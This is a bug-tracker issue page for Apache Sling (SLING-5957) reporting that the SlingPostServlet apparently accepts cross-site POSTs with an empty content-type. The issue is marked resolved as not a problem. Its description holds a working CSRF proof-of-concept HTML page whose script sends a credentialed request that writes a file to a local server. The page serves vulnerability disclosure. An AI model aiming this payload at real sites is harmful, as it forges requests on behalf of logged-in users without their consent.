Uploaded image for project: 'Sling'
  1. Sling
  2. SLING-5957

SlingPostServlet: susceptible CSRF with empty content-type

Attach filesAttach ScreenshotVotersWatch issueWatchersCreate sub-taskLinkCloneUpdate Comment AuthorReplace String in CommentUpdate Comment VisibilityDelete Comments
    XMLWordPrintableJSON

Details

    • Bug
    • Status: Resolved
    • Major
    • Resolution: Not A Problem
    • None
    • None
    • Servlets

    Description

      The SlingPostServlet creates a resource from a cross-site request like so:

      <html>
        <body>
          <script>
            function submitRequest()
            {
              var xhr = new XMLHttpRequest();
              xhr.open("POST", "http://localhost:8080/test/csrf.txt", true);
              xhr.withCredentials = true;
              var body = "This file has been uploaded via CSRF.=\r\n";
              var aBody = new Uint8Array(body.length);
              for (var i = 0; i < aBody.length; i++)
                aBody[i] = body.charCodeAt(i); 
              xhr.send(new Blob([aBody]));
            }
          </script>
          <form action="#">
            <input type="button" value="Submit request" onclick="submitRequest();" />
          </form>
        </body>
      </html>
      

      Attachments

        Issue Links

        Activity

          This comment will be Viewable by All Users Viewable by All Users
          Cancel

          People

            Unassigned Unassigned
            dominique.jaeggi Dominique Jäggi
            Votes:
            0 Vote for this issue
            Watchers:
            4 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved:

              Slack

                Issue deployment